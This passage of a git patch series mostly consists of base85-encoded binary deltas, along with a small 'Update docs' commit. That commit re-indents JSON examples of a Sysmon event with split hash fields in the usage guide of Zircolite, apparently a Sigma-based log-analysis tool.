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 Date: Fri, 5 May 2023 16:28:17 +0200 Subject: [PATCH 3/3] Update docs --- docs/Usage.md | 24 ++++++++++++------------ docs/Zircolite_manual.pdf | Bin 669742 -> 669755 bytes 2 files changed, 12 insertions(+), 12 deletions(-) diff --git a/docs/Usage.md b/docs/Usage.md index e09d146..7f7f5da 100644 --- a/docs/Usage.md +++ b/docs/Usage.md @@ -245,10 +245,10 @@ Be careful when using aliases because the data is stored multiple times. For example, let's say we have this Sysmon event log : ```json - { - "Hashes": "SHA1=XX,MD5=X,SHA256=XXX,IMPHASH=XXXX", - "EventID": 1 - } +{ + "Hashes": "SHA1=XX,MD5=X,SHA256=XXX,IMPHASH=XXXX", + "EventID": 1 +} ``` With the following configuration, Zircolite will split the `hashes` field like this : @@ -268,14 +268,14 @@ With the following configuration, Zircolite will split the `hashes` field like t The final event log used to apply Sigma rules will look like this : ```json - { - "SHA1": "F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054", - "MD5": "04029E121A0CFA5991749937DD22A1D9", - "SHA256": "9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F", - "IMPHASH": "7C955A0ABC747F57CCC4324480737EF7", - "Hashes": "SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7", - "EventID": 1 - } +{ + "SHA1": "F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054", + "MD5": "04029E121A0CFA5991749937DD22A1D9", + "SHA256": "9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F", + "IMPHASH": "7C955A0ABC747F57CCC4324480737EF7", + "Hashes": "SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7", + "EventID": 1 +} ``` --- diff --git a/docs/Zircolite_manual.pdf b/docs/Zircolite_manual.pdf index 2dd5492af00fdecae579e424cfff548a904e91c9..2879dfe40b7e33587400434ae13e147f45094ede 100644 GIT binary patch delta 11291 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 